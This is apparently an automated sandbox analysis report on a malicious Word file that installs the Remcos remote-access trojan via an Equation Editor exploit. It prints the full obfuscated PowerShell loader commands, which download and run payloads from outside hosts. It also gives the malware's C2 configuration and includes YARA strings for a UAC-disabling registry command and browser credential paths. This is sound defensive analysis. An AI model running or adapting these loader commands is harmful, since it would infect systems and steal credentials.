Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Scan Order and Specification 01-10- 2024.docx

Overview

General Information

Sample name:Scan Order and Specification 01-10- 2024.docx
Analysis ID:1523191
MD5:fe8c8dbd1f4b4fa2023fe185c8ed9df0
SHA1:5988ab649d7bb7f0d3886027f22effb94f9869cd
SHA256:1acb6c95b780cceb7eab5a679c73e2c22b8e6550454164d2febb6b8b3a5094b5
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains an external reference to another file
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Obfuscated command line found
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 3348 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3800 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 3872 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\niceworkwithpcitureupdateson.vBS" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • powershell.exe (PID: 3916 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR1YgJyptRHIqJykubmFNZVszLDExLDJdLUpvaU4nJykoICgoJ3sxfXVybCA9IHswfWh0dCcrJ3BzJysnOi8nKycvcmF3LmcnKydpdCcrJ2h1YnVzZXJjb250JysnZW50JysnLmNvJysnbS9Ob0RlJysndGVjJysndE9uJysnL04nKydvRCcrJ2UnKyd0ZWN0JysnT24vcmVmcycrJy9oZWFkcy8nKydtYWluJysnL0RldGEnKydoTm8nKyd0aC1WLnR4dHswfTsgezEnKyd9JysnYicrJ2FzZTY0Q29udGVudCA9IChOZXcnKyctT2InKydqZWMnKyd0IFMnKyd5JysncycrJ3RlbS5OZXQnKycuV2ViJysnQ2xpZScrJ250KS4nKydEb3dubG8nKydhZFN0cicrJ2luZyh7JysnMX11JysncmwpOyB7MX1iJysnaW4nKydhcnlDb250ZW50ID0gWycrJ1N5c3QnKydlJysnbS4nKydDbycrJ252ZXInKyd0JysnXScrJzo6JysnRnJvbUJhJysnc2U2JysnNFMnKyd0JysncmknKyduZyh7JysnMScrJ31iYScrJ3NlJysnNjRDb250JysnZScrJ24nKyd0KTsgezF9YScrJ3NzZW1ibHkgPSBbJysnUmUnKydmbGVjdCcrJ2knKydvbicrJy4nKydBc3NlbScrJ2InKydseV0nKyc6OicrJ0xvJysnYWQoJysnezF9YicrJ2luYXInKyd5Q29udGUnKydudCk7IFtkbmwnKydpYi5JTy4nKydIb21lXScrJzo6JysnVkEnKydJKHsyfXR4JysndC5CR0YnKydSLycrJzAnKycxJysnNS84LjcuOCcrJzYxLjQwMS8vJysnOnB0dGh7Mn0sIHsnKycyJysnfScrJ2QnKydlc2EnKyd0aXZhZG97Mn0nKycsIHsyfWRlJysncycrJ2F0aXZhZCcrJ28nKyd7MicrJ30sIHsyJysnfWRlcycrJ2F0JysnaXZhJysnZG97JysnMn0nKycsIHsyfVInKydlJysnZ0FzbXsnKycyfSwgezInKyd9ezJ9LCcrJ3snKycyJysnfScrJ3syfSknKS1mIFtjSEFSXTM5LFtjSEFSXTM2LFtjSEFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • powershell.exe (PID: 4004 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GV '*mDr*').naMe[3,11,2]-JoiN'')( (('{1}url = {0}htt'+'ps'+':/'+'/raw.g'+'it'+'hubusercont'+'ent'+'.co'+'m/NoDe'+'tec'+'tOn'+'/N'+'oD'+'e'+'tect'+'On/refs'+'/heads/'+'main'+'/Deta'+'hNo'+'th-V.txt{0}; {1'+'}'+'b'+'ase64Content = (New'+'-Ob'+'jec'+'t S'+'y'+'s'+'tem.Net'+'.Web'+'Clie'+'nt).'+'Downlo'+'adStr'+'ing({'+'1}u'+'rl); {1}b'+'in'+'aryContent = ['+'Syst'+'e'+'m.'+'Co'+'nver'+'t'+']'+'::'+'FromBa'+'se6'+'4S'+'t'+'ri'+'ng({'+'1'+'}ba'+'se'+'64Cont'+'e'+'n'+'t); {1}a'+'ssembly = ['+'Re'+'flect'+'i'+'on'+'.'+'Assem'+'b'+'ly]'+'::'+'Lo'+'ad('+'{1}b'+'inar'+'yConte'+'nt); [dnl'+'ib.IO.'+'Home]'+'::'+'VA'+'I({2}tx'+'t.BGF'+'R/'+'0'+'1'+'5/8.7.8'+'61.401//'+':ptth{2}, {'+'2'+'}'+'d'+'esa'+'tivado{2}'+', {2}de'+'s'+'ativad'+'o'+'{2'+'}, {2'+'}des'+'at'+'iva'+'do{'+'2}'+', {2}R'+'e'+'gAsm{'+'2}, {2'+'}{2},'+'{'+'2'+'}'+'{2})')-f [cHAR]39,[cHAR]36,[cHAR]34))" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
            • RegAsm.exe (PID: 2136 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 1972 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ichnvnuxjbsorvkwq" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 1060 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ichnvnuxjbsorvkwq" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 1884 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\twmgvffrxjktbjyahjdg" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 2556 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\vyrywypslrcydpuequqaufz" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 1688 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\irflzfvzpruafqgyqnkxgb" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 2200 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\algvnlhhqgudzwxguvhnulfpxhl" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 1120 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\srzilnhhbbbtiyigffpvarsgam" MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "103.186.116.99:58934:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-IAW1Y3", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\nor\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F971B2FE.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
    • 0x1ad7:$obj2: \objdata
    • 0x1abd:$obj3: \objupdate
    • 0x1a98:$obj6: \objlink
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\creambananacakegoodforladieswholovethebananasametimesheknowtheveryniceideadslawyasgetbackgreatthingswithme____securethingsareinthr[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
    • 0x1ad7:$obj2: \objdata
    • 0x1abd:$obj3: \objupdate
    • 0x1a98:$obj6: \objlink

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x6c4b8:$a1: Remcos restarted by watchdog!
          • 0x6ca30:$a3: %02i:%02i:%02i:%03i
          0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
          • 0x6650c:$str_a1: C:\Windows\System32\cmd.exe
          • 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x6657c:$str_b2: Executing file:
          • 0x675fc:$str_b3: GetDirectListeningPort
          • 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x67128:$str_b7: \update.vbs
          • 0x665a4:$str_b9: Downloaded file:
          • 0x66590:$str_b10: Downloading file:
          • 0x66634:$str_b12: Failed to upload file:
          • 0x675c4:$str_b13: StartForward
          • 0x675e4:$str_b14: StopForward
          • 0x67080:$str_b15: fso.DeleteFile "
          • 0x67014:$str_b16: On Error Resume Next
          • 0x670b0:$str_b17: fso.DeleteFolder "
          • 0x66624:$str_b18: Uploaded file:
          • 0x665e4:$str_b19: Unable to delete:
          • 0x67048:$str_b20: while fso.FileExists("
          • 0x66ac1:$str_c0: [Firefox StoredLogins not found]
          Click to see the 22 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          12.2.powershell.exe.3ab0b60.1.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            12.2.powershell.exe.3ab0b60.1.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              12.2.powershell.exe.3ab0b60.1.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                12.2.powershell.exe.3ab0b60.1.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x690b8:$a1: Remcos restarted by watchdog!
                • 0x69630:$a3: %02i:%02i:%02i:%03i
                12.2.powershell.exe.3ab0b60.1.unpackREMCOS_RAT_variantsunknownunknown
                • 0x6310c:$str_a1: C:\Windows\System32\cmd.exe
                • 0x63088:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x63088:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x63588:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                • 0x63db8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                • 0x6317c:$str_b2: Executing file:
                • 0x641fc:$str_b3: GetDirectListeningPort
                • 0x63ba8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                • 0x63d28:$str_b7: \update.vbs
                • 0x631a4:$str_b9: Downloaded file:
                • 0x63190:$str_b10: Downloading file:
                • 0x63234:$str_b12: Failed to upload file:
                • 0x641c4:$str_b13: StartForward
                • 0x641e4:$str_b14: StopForward
                • 0x63c80:$str_b15: fso.DeleteFile "
                • 0x63c14:$str_b16: On Error Resume Next
                • 0x63cb0:$str_b17: fso.DeleteFolder "
                • 0x63224:$str_b18: Uploaded file:
                • 0x631e4:$str_b19: Unable to delete:
                • 0x63c48:$str_b20: while fso.FileExists("
                • 0x636c1:$str_c0: [Firefox StoredLogins not found]
                Click to see the 18 entries

                Sigma Signatures

                Exploits

                barindex
                Sigma detected: EQNEDT32.EXE connecting to internet
                Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 104.168.7.8, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3800, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49169
                Sigma detected: File Dropped By EQNEDT32EXE
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3800, TargetFilename: C:\Users\user\AppData\Roaming\niceworkwithpcitureupdateson.vBS

                System Summary

                barindex
                Sigma detected: Base64 Encoded PowerShell Command Detected
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR1YgJyptRHIqJykubmFNZVszLDExLDJdLUpvaU4nJykoICgoJ3sxfXVybCA9IHswfWh0dCcrJ3BzJysnOi8nKycvcmF3LmcnKydpdCcrJ2h1YnVzZXJjb250JysnZW50JysnLmNvJysnbS9Ob0RlJysndGVjJysndE9uJysnL04nKydvRCcrJ2UnKyd0ZWN0JysnT24vcmVmcycrJy9oZWFkcy8nKydtYWluJysnL0RldGEnKydoTm8nKyd0aC1WLnR4dHswfTsgezEnKyd9JysnYicrJ2FzZTY0Q29udGVudCA9IChOZXcnKyctT2InKydqZWMnKyd0IFMnKyd5JysncycrJ3RlbS5OZXQnKycuV2ViJysnQ2xpZScrJ250KS4nKydEb3dubG8nKydhZFN0cicrJ2luZyh7JysnMX11JysncmwpOyB7MX1iJysnaW4nKydhcnlDb250ZW50ID0gWycrJ1N5c3QnKydlJysnbS4nKydDbycrJ252ZXInKyd0JysnXScrJzo6JysnRnJvbUJhJysnc2U2JysnNFMnKyd0JysncmknKyduZyh7JysnMScrJ31iYScrJ3NlJysnNjRDb250JysnZScrJ24nKyd0KTsgezF9YScrJ3NzZW1ibHkgPSBbJysnUmUnKydmbGVjdCcrJ2knKydvbicrJy4nKydBc3NlbScrJ2InKydseV0nKyc6OicrJ0xvJysnYWQoJysnezF9YicrJ2luYXInKyd5Q29udGUnKydudCk7IFtkbmwnKydpYi5JTy4nKydIb21lXScrJzo6JysnVkEnKydJKHsyfXR4JysndC5CR0YnKydSLycrJzAnKycxJysnNS84LjcuOCcrJzYxLjQwMS8vJysnOnB0dGh7Mn0sIHsnKycyJysnfScrJ2QnKydlc2EnKyd0aXZhZG97Mn0nKycsIHsyfWRlJysncycrJ2F0aXZhZCcrJ28nKyd7MicrJ30sIHsyJysnfWRlcycrJ2F0JysnaXZhJysnZG97JysnMn0nKycsIHsyfVInKydlJysnZ0FzbXsnKycyfSwgezInKyd9ezJ9LCcrJ3snKycyJysnfScrJ3syfSknKS1mIFtjSEFSXTM5LFtjSEFSXTM2LFtjSEFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR1YgJyptRHIqJykubmFNZVszLDExLDJdLUpvaU4nJykoICgoJ3sxfXVybCA9IHswfWh0dCcrJ3BzJysnOi8nKycvcmF3LmcnKydpdCcrJ2h1YnVzZXJjb250JysnZW50JysnLmNvJysnbS9Ob0RlJysndGVjJysndE9uJysnL04nKydvRCcrJ2UnKyd0ZWN0JysnT24vcmVmcycrJy9oZWFkcy8nKydtYWluJysnL0RldGEnKydoTm8nKyd0aC1WLnR4dHswfTsgezEnKyd9JysnYicrJ2FzZTY0Q29udGVudCA9IChOZXcnKyctT2InKydqZWMnKyd0IFMnKyd5JysncycrJ3RlbS5OZXQnKycuV2ViJysnQ2xpZScrJ250KS4nKydEb3dubG8nKydhZFN0cicrJ2luZyh7JysnMX11JysncmwpOyB7MX1iJysnaW4nKydhcnlDb250ZW50ID0gWycrJ1N5c3QnKydlJysnbS4nKydDbycrJ252ZXInKyd0JysnXScrJzo6JysnRnJvbUJhJysnc2U2JysnNFMnKyd0JysncmknKyduZyh7JysnMScrJ31iYScrJ3NlJysnNjRDb250JysnZScrJ24nKyd0KTsgezF9YScrJ3NzZW1ibHkgPSBbJysnUmUnKydmbGVjdCcrJ2knKydvbicrJy4nKydBc3NlbScrJ2InKydseV0nKyc6OicrJ0xvJysnYWQoJysnezF9YicrJ2luYXInKyd5Q29udGUnKydudCk7IFtkbmwnKydpYi5JTy4nKydIb21lXScrJzo6JysnVkEnKydJKHsyfXR4JysndC5CR0YnKydSLycrJzAnKycxJysnNS84LjcuOCcrJzYxLjQwMS8vJysnOnB0dGh7Mn0sIHsnKycyJysnfScrJ2QnKydlc2EnKyd0aXZhZG97Mn0nKycsIHsyfWRlJysncycrJ2F0aXZhZCcrJ28nKyd7MicrJ30sIHsyJysnfWRlcycrJ2F0JysnaXZhJysnZG97JysnMn0nKycsIHsyfVInKydlJysnZ0FzbXsnKycyfSwgezInKyd9ezJ9LCcrJ3snKycyJysnfScrJ3syfSknKS1mIFtjSEFSXTM5LFtjSEFSXTM2LFtjSEFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName:
                Sigma detected: Equation Editor Network Connection
                Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49169, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3800, Protocol: tcp, SourceIp: 104.168.7.8, SourceIsIpv6: false, SourcePort: 80
                Sigma detected: Potential PowerShell Command Line Obfuscation
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GV '*mDr*').naMe[3,11,2]-JoiN'')( (('{1}url = {0}htt'+'ps'+':/'+'/raw.g'+'it'+'hubusercont'+'ent'+'.co'+'m/NoDe'+'tec'+'tOn'+'/N'+'oD'+'e'+'tect'+'On/refs'+'/heads/'+'main'+'/Deta'+'hNo'+'th-V.txt{0}; {1'+'}'+'b'+'ase64Content = (New'+'-Ob'+'jec'+'t S'+'y'+'s'+'tem.Net'+'.Web'+'Clie'+'nt).'+'Downlo'+'adStr'+'ing({'+'1}u'+'rl); {1}b'+'in'+'aryContent = ['+'Syst'+'e'+'m.'+'Co'+'nver'+'t'+']'+'::'+'FromBa'+'se6'+'4S'+'t'+'ri'+'ng({'+'1'+'}ba'+'se'+'64Cont'+'e'+'n'+'t); {1}a'+'ssembly = ['+'Re'+'flect'+'i'+'on'+'.'+'Assem'+'b'+'ly]'+'::'+'Lo'+'ad('+'{1}b'+'inar'+'yConte'+'nt); [dnl'+'ib.IO.'+'Home]'+'::'+'VA'+'I({2}tx'+'t.BGF'+'R/'+'0'+'1'+'5/8.7.8'+'61.401//'+':ptth{2}, {'+'2'+'}'+'d'+'esa'+'tivado{2}'+', {2}de'+'s'+'ativad'+'o'+'{2'+'}, {2'+'}des'+'at'+'iva'+'do{'+'2}'+', {2}R'+'e'+'gAsm{'+'2}, {2'+'}{2},'+'{'+'2'+'}'+'{2})')-f [cHAR]39,[cHAR]36,[cHAR]34))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GV '*mDr*').naMe[3,11,2]-JoiN'')( (('{1}url = {0}htt'+'ps'+':/'+'/raw.g'+'it'+'hubusercont'+'ent'+'.co'+'m/NoDe'+'tec'+'tOn'+'/N'+'oD'+'e'+'tect'+'On/refs'+'/heads/'+'main'+'/Deta'+'hNo'+'th-V.txt{0}; {1'+'}'+'b'+'ase64Content = (New'+'-Ob'+'jec'+'t S'+'y'+'s'+'tem.Net'+'.Web'+'Clie'+'nt).'+'Downlo'+'adStr'+'ing({'+'1}u'+'rl); {1}b'+'in'+'aryContent = ['+'Syst'+'e'+'m.'+'Co'+'nver'+'t'+']'+'::'+'FromBa'+'se6'+'4S'+'t'+'ri'+'ng({'+'1'+'}ba'+'se'+'64Cont'+'e'+'n'+'t); {1}a'+'ssembly = ['+'Re'+'flect'+'i'+'on'+'.'+'Assem'+'b'+'ly]'+'::'+'Lo'+'ad('+'{1}b'+'inar'+'yConte'+'nt); [dnl'+'ib.IO.'+'Home]'+'::'+'VA'+'I({2}tx'+'t.BGF'+'R/'+'0'+'1'+'5/8.7.8'+'61.401//'+':ptth{2}, {'+'2'+'}'+'d'+'esa'+'tivado{2}'+', {2}de'+'s'+'ativad'+'o'+'{2'+'}, {2'+'}des'+'at'+'iva'+'do{'+'2}'+', {2}R'+'e'+'gAsm{'+'2}, {2'+'}{2},'+'{'+'2'+'}'+'{2})')-f [cHAR]39,[cHAR]36,[cHAR]34))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR1YgJyptRHIqJykubmFNZVszLDExLDJdLUpvaU4nJykoICgoJ3sxfXVybCA9IHswfWh0dCcrJ3BzJysnOi8nKycvcmF3LmcnKydpdCcrJ2h1YnVzZXJjb250JysnZW50JysnLmNvJysnbS9Ob0RlJysndGVjJysndE9uJysnL04nKydvRCcrJ2UnKyd0ZWN0JysnT24vcmVmcycrJy9oZWFkcy8nKydtYWluJysnL0RldGEnKydoTm8nKyd0aC1WLnR4dHswfTsgezEnKyd9JysnYicrJ2FzZTY0Q29udGVudCA9IChOZXcnKyctT2InKydqZWMnKyd0IFMnKyd5JysncycrJ3RlbS5OZXQnKycuV2ViJysnQ2xpZScrJ250KS4nKydEb3dubG8nKydhZFN0cicrJ2luZyh7JysnMX11JysncmwpOyB7MX1iJysnaW4nKydhcnlDb250ZW50ID0gWycrJ1N5c3QnKydlJysnbS4nKydDbycrJ252ZXInKyd0JysnXScrJzo6JysnRnJvbUJhJysnc2U2JysnNFMnKyd0JysncmknKyduZyh7JysnMScrJ31iYScrJ3NlJysnNjRDb250Jys
                Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
